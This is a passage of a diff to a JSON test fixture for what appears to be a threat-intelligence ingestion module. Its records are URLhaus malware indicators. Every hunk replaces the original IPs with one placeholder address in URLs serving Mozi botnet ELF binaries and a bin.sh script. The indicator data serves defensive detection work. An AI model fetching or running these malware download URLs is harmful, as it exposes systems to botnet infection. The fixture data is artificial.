"{\"id\":\"961245\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961245/\",\"url\":\"http://89.160.20.156:50381/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14691,18 +14691,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.154.78:44219/Mozi.m", + "original": "http://89.160.20.156:44219/Mozi.m", "scheme": "http", "port": 44219, - "domain": "123.14.154.78", - "full": "http://123.14.154.78:44219/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44219/Mozi.m" }, - "ip": "123.14.154.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693644699Z", - "original": "{\"id\":\"961243\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961243/\",\"url\":\"http://123.14.154.78:44219/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.154.78\",\"date_added\":\"2021-01-14 19:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026681Z", + "original": "{\"id\":\"961243\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961243/\",\"url\":\"http://89.160.20.156:44219/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14741,18 +14741,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://61.53.42.182:36619/bin.sh", + "original": "http://89.160.20.156:36619/bin.sh", "scheme": "http", "port": 36619, - "domain": "61.53.42.182", - "full": "http://61.53.42.182:36619/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36619/bin.sh" }, - "ip": "61.53.42.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693648406Z", - "original": "{\"id\":\"961242\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961242/\",\"url\":\"http://61.53.42.182:36619/bin.sh\",\"url_status\":\"offline\",\"host\":\"61.53.42.182\",\"date_added\":\"2021-01-14 19:01:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026688Z", + "original": "{\"id\":\"961242\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961242/\",\"url\":\"http://89.160.20.156:36619/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:01:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14790,18 +14790,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.58.166.75:59976/i", + "original": "http://89.160.20.156:59976/i", "scheme": "http", "port": 59976, - "domain": "115.58.166.75", - "full": "http://115.58.166.75:59976/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59976/i" }, - "ip": "115.58.166.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693651782Z", - "original": "{\"id\":\"961241\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961241/\",\"url\":\"http://115.58.166.75:59976/i\",\"url_status\":\"online\",\"host\":\"115.58.166.75\",\"date_added\":\"2021-01-14 18:56:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.026695Z", + "original": "{\"id\":\"961241\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961241/\",\"url\":\"http://89.160.20.156:59976/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:56:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14839,18 +14839,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.92.217.228:48688/Mozi.a", + "original": "http://89.160.20.156:48688/Mozi.a", "scheme": "http", "port": 48688, - "domain": "59.92.217.228", - "full": "http://59.92.217.228:48688/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48688/Mozi.a" }, - "ip": "59.92.217.228" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693654848Z", - "original": "{\"id\":\"961239\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961239/\",\"url\":\"http://59.92.217.228:48688/Mozi.a\",\"url_status\":\"online\",\"host\":\"59.92.217.228\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026701900Z", + "original": "{\"id\":\"961239\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961239/\",\"url\":\"http://89.160.20.156:48688/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14888,18 +14888,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.145.179.219:45682/Mozi.m", + "original": "http://89.160.20.156:45682/Mozi.m", "scheme": "http", "port": 45682, - "domain": "221.145.179.219", - "full": "http://221.145.179.219:45682/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45682/Mozi.m" }, - "ip": "221.145.179.219" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693658044Z", - "original": "{\"id\":\"961240\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961240/\",\"url\":\"http://221.145.179.219:45682/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.145.179.219\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026708700Z", + "original": "{\"id\":\"961240\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961240/\",\"url\":\"http://89.160.20.156:45682/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14937,18 +14937,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.136.49:34922/Mozi.m", + "original": "http://89.160.20.156:34922/Mozi.m", "scheme": "http", "port": 34922, - "domain": "59.99.136.49", - "full": "http://59.99.136.49:34922/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34922/Mozi.m" }, - "ip": "59.99.136.49" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693661270Z", - "original": "{\"id\":\"961238\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961238/\",\"url\":\"http://59.99.136.49:34922/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.136.49\",\"date_added\":\"2021-01-14 18:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026715600Z", + "original": "{\"id\":\"961238\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961238/\",\"url\":\"http://89.160.20.156:34922/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14986,18 +14986,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://92.54.237.196:37489/Mozi.m", + "original": "http://89.160.20.156:37489/Mozi.m", "scheme": "http", "port": 37489, - "domain": "92.54.237.196", - "full": "http://92.54.237.196:37489/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37489/Mozi.m" }, - "ip": "92.54.237.196" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693664476Z", - "original": "{\"id\":\"961233\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961233/\",\"url\":\"http://92.54.237.196:37489/Mozi.m\",\"url_status\":\"online\",\"host\":\"92.54.237.196\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026722600Z", + "original": "{\"id\":\"961233\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961233/\",\"url\":\"http://89.160.20.156:37489/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15035,18 +15035,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.184:51940/Mozi.m", + "original": "http://89.160.20.156:51940/Mozi.m", "scheme": "http", "port": 51940, - "domain": "186.33.104.184", - "full": "http://186.33.104.184:51940/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51940/Mozi.m" }, - "ip": "186.33.104.184" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693667903Z", - "original": "{\"id\":\"961234\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961234/\",\"url\":\"http://186.33.104.184:51940/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.184\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026729600Z", + "original": "{\"id\":\"961234\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961234/\",\"url\":\"http://89.160.20.156:51940/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15084,18 +15084,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.99.40.58:49599/Mozi.a", + "original": "http://89.160.20.156:49599/Mozi.a", "scheme": "http", "port": 49599, - "domain": "59.99.40.58", - "full": "http://59.99.40.58:49599/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49599/Mozi.a" }, - "ip": "59.99.40.58" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693671249Z", - "original": "{\"id\":\"961235\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961235/\",\"url\":\"http://59.99.40.58:49599/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.99.40.58\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026736500Z", + "original": "{\"id\":\"961235\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961235/\",\"url\":\"http://89.160.20.156:49599/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15133,18 +15133,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.92.249:53436/Mozi.m", + "original": "http://89.160.20.156:53436/Mozi.m", "scheme": "http", "port": 53436, - "domain": "59.99.92.249", - "full": "http://59.99.92.249:53436/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53436/Mozi.m" }, - "ip": "59.99.92.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693674665Z", - "original": "{\"id\":\"961236\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961236/\",\"url\":\"http://59.99.92.249:53436/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.92.249\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026743400Z", + "original": "{\"id\":\"961236\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961236/\",\"url\":\"http://89.160.20.156:53436/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15182,18 +15182,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.249.11.35:57237/Mozi.a", + "original": "http://89.160.20.156:57237/Mozi.a", "scheme": "http", "port": 57237, - "domain": "58.249.11.35", - "full": "http://58.249.11.35:57237/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57237/Mozi.a" }, - "ip": "58.249.11.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693679074Z", - "original": "{\"id\":\"961237\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961237/\",\"url\":\"http://58.249.11.35:57237/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.249.11.35\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026750300Z", + "original": "{\"id\":\"961237\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961237/\",\"url\":\"http://89.160.20.156:57237/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15231,18 +15231,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.251.45:50907/Mozi.m", + "original": "http://89.160.20.156:50907/Mozi.m", "scheme": "http", "port": 50907, - "domain": "42.224.251.45", - "full": "http://42.224.251.45:50907/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50907/Mozi.m" }, - "ip": "42.224.251.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693683522Z", - "original": "{\"id\":\"961232\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961232/\",\"url\":\"http://42.224.251.45:50907/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.251.45\",\"date_added\":\"2021-01-14 18:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026757200Z", + "original": "{\"id\":\"961232\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961232/\",\"url\":\"http://89.160.20.156:50907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15280,18 +15280,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.208.134.248:41910/Mozi.m", + "original": "http://89.160.20.156:41910/Mozi.m", "scheme": "http", "port": 41910, - "domain": "117.208.134.248", - "full": "http://117.208.134.248:41910/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41910/Mozi.m" }, - "ip": "117.208.134.248" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693686868Z", - "original": "{\"id\":\"961231\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961231/\",\"url\":\"http://117.208.134.248:41910/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.208.134.248\",\"date_added\":\"2021-01-14 18:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026764300Z", + "original": "{\"id\":\"961231\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961231/\",\"url\":\"http://89.160.20.156:41910/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15329,18 +15329,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.93.86:57217/Mozi.m", + "original": "http://89.160.20.156:57217/Mozi.m", "scheme": "http", "port": 57217, - "domain": "115.55.93.86", - "full": "http://115.55.93.86:57217/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57217/Mozi.m" }, - "ip": "115.55.93.86" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693690445Z", - "original": "{\"id\":\"961229\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961229/\",\"url\":\"http://115.55.93.86:57217/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.93.86\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026771300Z", + "original": "{\"id\":\"961229\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961229/\",\"url\":\"http://89.160.20.156:57217/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15378,18 +15378,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.196.50.105:47632/Mozi.m", + "original": "http://89.160.20.156:47632/Mozi.m", "scheme": "http", "port": 47632, - "domain": "117.196.50.105", - "full": "http://117.196.50.105:47632/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47632/Mozi.m" }, - "ip": "117.196.50.105" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693694102Z", - "original": "{\"id\":\"961230\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961230/\",\"url\":\"http://117.196.50.105:47632/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.196.50.105\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026778200Z", + "original": "{\"id\":\"961230\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961230/\",\"url\":\"http://89.160.20.156:47632/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15427,18 +15427,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://116.75.197.63:46654/Mozi.a", + "original": "http://89.160.20.156:46654/Mozi.a", "scheme": "http", "port": 46654, - "domain": "116.75.197.63", - "full": "http://116.75.197.63:46654/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46654/Mozi.a" }, - "ip": "116.75.197.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693697799Z", - "original": "{\"id\":\"961227\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961227/\",\"url\":\"http://116.75.197.63:46654/Mozi.a\",\"url_status\":\"online\",\"host\":\"116.75.197.63\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026785100Z", + "original": "{\"id\":\"961227\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961227/\",\"url\":\"http://89.160.20.156:46654/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15476,18 +15476,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.33.224:59073/Mozi.m", + "original": "http://89.160.20.156:59073/Mozi.m", "scheme": "http", "port": 59073, - "domain": "115.55.33.224", - "full": "http://115.55.33.224:59073/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59073/Mozi.m" }, - "ip": "115.55.33.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693701977Z", - "original": "{\"id\":\"961228\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961228/\",\"url\":\"http://115.55.33.224:59073/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.33.224\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026792100Z", + "original": "{\"id\":\"961228\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961228/\",\"url\":\"http://89.160.20.156:59073/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15525,18 +15525,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://116.75.192.61:37958/Mozi.a", + "original": "http://89.160.20.156:37958/Mozi.a", "scheme": "http", "port": 37958, - "domain": "116.75.192.61", - "full": "http://116.75.192.61:37958/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37958/Mozi.a" }, - "ip": "116.75.192.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693705303Z", - "original": "{\"id\":\"961221\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961221/\",\"url\":\"http://116.75.192.61:37958/Mozi.a\",\"url_status\":\"offline\",\"host\":\"116.75.192.61\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026798900Z", + "original": "{\"id\":\"961221\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961221/\",\"url\":\"http://89.160.20.156:37958/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15574,18 +15574,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.178.250.25:53943/Mozi.m", + "original": "http://89.160.20.156:53943/Mozi.m", "scheme": "http", "port": 53943, - "domain": "119.178.250.25", - "full": "http://119.178.250.25:53943/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53943/Mozi.m" }, - "ip": "119.178.250.25" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693708920Z", - "original": "{\"id\":\"961222\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961222/\",\"url\":\"http://119.178.250.25:53943/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.178.250.25\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not 